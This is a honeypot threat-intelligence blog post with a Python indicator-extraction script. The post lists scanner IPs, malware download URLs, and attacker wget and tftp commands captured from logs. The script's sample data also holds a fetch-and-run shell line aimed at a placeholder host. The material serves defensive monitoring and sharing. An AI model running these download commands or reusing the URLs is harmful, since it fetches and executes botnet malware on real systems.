
Saturday, 31 December 2016

Sylvester 2016 - Honeypot report

Happy New Year everyone

I have had my honeypot (https://github.com/johestephan/SendMeSpamIDS.py) running for quite a while now. I take the chance of a new year to summarize the last weeks in one Sylvester report. The indicators are fetched using the shell scripts out of my toolbox (https://github.com/johestephan/CTI-Toolbox); in particular
  • getindiV1.sh - fetch all indicators (see report below)
  • getCodeV1.sh - try to execute all wget calls in a file
were created to operate on the log files I receive.
This report is also available on X-Force Exchange.
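As an added example (not code from this post or from the CTI-Toolbox repository), here is a small Python indicator extractor that does what the post says getindiV1.sh does: it pulls the scanning source IPs, HTTP URLs, wget targets and tftp commands out of honeypot log lines and prints them in the same four sections as the report below. The log line layout `<timestamp> <source ip> <payload>`, the sample lines and the hostnames (reserved `.invalid` TLD) are constructed assumptions; the real SendMeSpamIDS.py log format may differ.

```python
"""Indicator extractor for honeypot logs (added example, not the post's own script).

Assumed log line layout: "<timestamp> <source ip> <payload>".  The sample
lines below are constructed; the hostnames use the reserved .invalid TLD.
"""
import re
from urllib.parse import urlparse

# Constructed sample log lines (layout is an assumption, see module docstring).
SAMPLE_LOG = """\
2016-12-30T01:02:03 94.102.48.194 GET / HTTP/1.1
2016-12-30T01:05:11 185.128.43.174 POST /cgi-bin/;cd /tmp;wget http://example.invalid:8080/a;chmod +x a;./a
2016-12-30T02:17:40 185.128.43.174 tftp -l b -r b -g example.invalid 6969
2016-12-30T03:00:00 51.15.44.122 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
2016-12-30T03:10:22 94.102.48.194 cd /tmp; wget http://example.invalid:8080/a
"""

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# A URL ends at whitespace, quotes, angle brackets or a shell separator.
URL_RE = re.compile(r"https?://[^\s\"'<>;|&]+")
# wget target: skip any options, capture the URL argument.
WGET_RE = re.compile(r"\bwget\s+(?:-\S+\s+)*(https?://[^\s\"'<>;|&]+)")
# A tftp command runs up to the next shell separator.
TFTP_RE = re.compile(r"\btftp\b[^;|&\n]*")

# Hostnames whose URLs are protocol noise rather than attacker infrastructure;
# schemas.xmlsoap.org is the SOAP envelope namespace carried by SOAP requests.
BENIGN_HOSTS = {"schemas.xmlsoap.org"}

# Report sections in the order the post's report uses.
SECTIONS = [
    ("ips", "Scanning IPs:"),
    ("urls", "HTTP urls (object):"),
    ("wget", "WGET (objects):"),
    ("tftp", "TFTP (objects):"),
]


def parse_line(line):
    """Split one log line into (source ip, payload); None if it does not fit the layout."""
    parts = line.split(" ", 2)
    if len(parts) < 3 or not IP_RE.fullmatch(parts[1]):
        return None
    return parts[1], parts[2]


def extract_indicators(lines):
    """Collect deduplicated, string-sorted indicators from an iterable of log lines."""
    found = {"ips": set(), "urls": set(), "wget": set(), "tftp": set()}
    for line in lines:
        parsed = parse_line(line.rstrip("\n"))
        if parsed is None:
            continue  # malformed line: skip rather than abort the whole report
        src, payload = parsed
        found["ips"].add(src)
        found["urls"].update(URL_RE.findall(payload))
        found["wget"].update(WGET_RE.findall(payload))
        found["tftp"].update(m.group(0).strip() for m in TFTP_RE.finditer(payload))
    # Plain string sort gives the same stable ordering as sort -u on the shell side.
    return {key: sorted(values) for key, values in found.items()}


def drop_benign(urls, benign_hosts=BENIGN_HOSTS):
    """Remove URLs whose host is on the allow-list before the list is shared as indicators."""
    return [u for u in urls if (urlparse(u).hostname or "") not in benign_hosts]


def render_report(indicators):
    """Render the four sections in the same layout as the post's report."""
    out = []
    for key, title in SECTIONS:
        out.append(title)
        out.append("=" * 37)
        out.extend(indicators[key])
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    ind = extract_indicators(SAMPLE_LOG.splitlines())
    ind["urls"] = drop_benign(ind["urls"])
    print(render_report(ind), end="")
```

Two points the report below illustrates and the example keeps: indicator sets are deduplicated and sorted as plain strings (which is why the IP list starts with 127.0.0.1 and 163.x before 23.x), and URLs such as the schemas.xmlsoap.org namespace are protocol noise from SOAP requests rather than attacker hosts, so an allow-list pass like drop_benign is worth running before publishing the list.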

Scanning IPs:
=====================================
127.0.0.1
163.172.190.56
185.128.43.174
195.154.179.148
212.175.89.190
23.152.0.18
46.4.90.85
51.15.44.122
51.15.56.205
54.218.98.192
62.210.149.68
81.12.119.27
81.12.121.183
81.12.126.233
81.171.12.232
89.248.168.213
89.248.172.207
92.50.64.234
94.102.48.194
94.102.56.181
HTTP urls (object):
=====================================
http
http://163.21.46.2/appserv/a.txt
http://180.163.113.82/check
http://5.39.93.71/2jvf
http://5.39.93.71/aenv
http://5.8.65.5/1
http://5.8.65.5/2
http://95.215.62.11:80/bin.sh
http://afpen.pw:8080/a
http://binpt.pw/a
http://clientapi.ipip.net/echo.php
http://cvfyb.pw:8080/a
http://gdiqt.pw:8080/a
httpheader.net
http://httpheader.net/
http://ixvip.pw:8080/a
http://jgop.org/a
http://jzion.pw/a
http://l.ocalhost.host/1
http://l.ocalhost.host/2
http://l.ocalhost.host/3
http://mrjyq.pw:8080/a
http://mvtul.pw:8080/a
http://qplok.pw:8080/a
http://qrxou.pw:8080/a
http://schemas.xmlsoap.org/soap/encoding/
http://schemas.xmlsoap.org/soap/envelope/
https://github.com/robertdavidgraham/masscan
http://tr069.pw/1
http://tr069.pw/2
http://vizxv.pw/a
WGET (objects):
=====================================
http://5.8.65.5/1
http://5.8.65.5/2
http://95.215.62.11:80/bin.sh
http://afpen.pw:8080/a
http://binpt.pw/a
http://cvfyb.pw:8080/a
http://gdiqt.pw:8080/a
http://ixvip.pw:8080/a
http://jgop.org/a
http://jzion.pw/a
http://l.ocalhost.host/1
http://l.ocalhost.host/2
http://l.ocalhost.host/3
http://mrjyq.pw:8080/a
http://mvtul.pw:8080/a
http://qplok.pw:8080/a
http://qrxou.pw:8080/a
http://tr069.pw/1
http://tr069.pw/2
http://vizxv.pw/a
TFTP (objects):
=====================================
tftp -l 3 -r 1 -g l.ocalhost.host
tftp -l b -r b -g afpen.pw 6969
tftp -l b -r b -g binpt.pw
tftp -l b -r b -g cvfyb.pw 6969
tftp -l b -r b -g gdiqt.pw 6969
tftp -l b -r b -g ixvip.pw 6969
tftp -l b -r b -g jgop.org
tftp -l b -r b -g jzion.pw
tftp -l b -r b -g mrjyq.pw 6969
tftp -l b -r b -g mvtul.pw 6969
tftp -l b -r b -g qplok.pw 6969
tftp -l b -r b -g qrxou.pw 6969
tftp -l b -r b -g vizxv.pw